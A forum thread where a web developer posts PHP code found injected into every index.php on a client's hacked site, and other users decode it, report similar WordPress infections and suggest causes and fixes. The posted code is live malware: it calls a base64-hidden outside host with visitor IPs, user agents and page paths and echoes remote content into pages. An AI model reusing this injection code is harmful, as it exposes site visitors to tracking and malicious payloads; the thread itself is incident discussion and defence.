Website hacked...strange

[Ninjakreborn]

The code below was inserted into every single index.php on one of my clients sites.  It went through and every single index.php page (in each folder) had that following code put in.  It was

strange. As far as I can tell there are no FTP logs, besides my own IP.  This site was heavily built by someone else, I have been enhancing the system for a few months but it hasn't undergone a

full security audit yet.  What could have caused this. The weird thing is it's not loading it into the very top of the file..the security.inc.php is my file..and somehow they always get inserted below that file. But the <?

is inserted right after it.  I also don't use generally the <? shorthand, that was his previous code..but that entire <? block that has the hack attempt is very strange.

 

Any advice on how this is generally done, and anyone with similar issues?

<? require_once('security.inc.php'); ?><?
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            $stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>

[Ninjakreborn]

I edited it, and made it look exactly as it was inserted into my index.php pages throughout the entire site.

[QuickOldCar]

The base64 code is leading it back to http://hotlogupdate.com/stat/stat.php

[Pikachu2000]

Not surprisingly, Google turned up some results. Sounds like it isn't uncommon:

 

http://www.google.com/support/forum/p/Webmasters/thread?tid=7533f9465f98b074&hl=en

http://peterrosenmai.com/a-hacking-visible-only-to-google

http://answers.yahoo.com/question/index?qid=20110908122845AAKi4Yw

[Philip]

Gotta admit, that's actually a clever hack.

 

Is security.inc.php yours?

[Ninjakreborn]

Not "Mine" but from the previous developer. It just performs the checks to make sure they are logged in, it's on every page of the site. On some pages I had added database.inc.php. 

So that security hack was entered under neath the original security.inc.php hack..which is strange.    Also it says it only afffects google, and oddly..I didn't see the issue in Google Chrome or Firefox..I had to go into IE and see the "Layout" mess up to fix it..then when I did that, I started getting virus detections on Nod32 ESET.  So it was very strange. Any ideas on how to plug the hole? Also the host is currently

[Philip]

Check for any scripts with file uploads that might have a security hole, change your ftp passwords (and really all of them, since they should be changed every X months), and remove the offending code if you haven't already. You might be able to find something within the access/error logs on how they got in.

[QuickOldCar]

They logged in somehow.

 

I use fail2ban for too many attempted logins, stop dictionary attacks.

[Ninjakreborn]

Alright, will do some searching on it and do that. Thanks again.

[sKunKbad]

I once had a virus on one of my network computers that was sniffing network traffic. Because I was using standard FTP, it was stealing my FTP login username and password. Once I took that computer offline, everything was fine. You ought to make sure that your computer, as well as all the computers on your network are clean.

[jexley]

I have only just fixed the "index.php" files on all of my clients' WordPress sites.

 

Here's the lowdown:

Almost all were at least version 3.2

• , one was as old as 2.8 and one was 3.3.1
  
• In addition to every "index.php" file that was messed with (with the identical script you posted above), they also hacked the "footer.php" file in each theme.
  
• The URL that it sends you to f*ckered my laptop for about 4 days now (only just got things working again) after I got hit with the "System Check" virus as well as the "iexplore.exe" virus (that plays random ads and music while saying your speakers are muted).  SO MUCH FUN.
  

 

That's about where I'm at now.  I hardly see sweet f*ckall on Google or WordPress about this sh*t, but it's bad, bad news and I'm pretty cheesed off that I so wholeheartedly supported WordPress for years now and it would appear that hackers have targeted my favourite Open Source Code.

[Eng_A_Moktar]

Hi all.

I've wrote an auto fix application for this issue.

I'm working on find out how do they get in.

any info could help.

thanks

Eng_A_Moktar [at] yahoo.com

[Jonpaulh]

This post is a bit old, but for those people looking, it is likely an issue with timthumb.php. See the following link for the best information possible I have found http://markmaunder.com/2011/08/01/zero-day-vulnerability-in-many-wordpress-themes/ (if the link did not post look for Mark Maunder zero-day-vulnerability-in-many-wordpress-themes)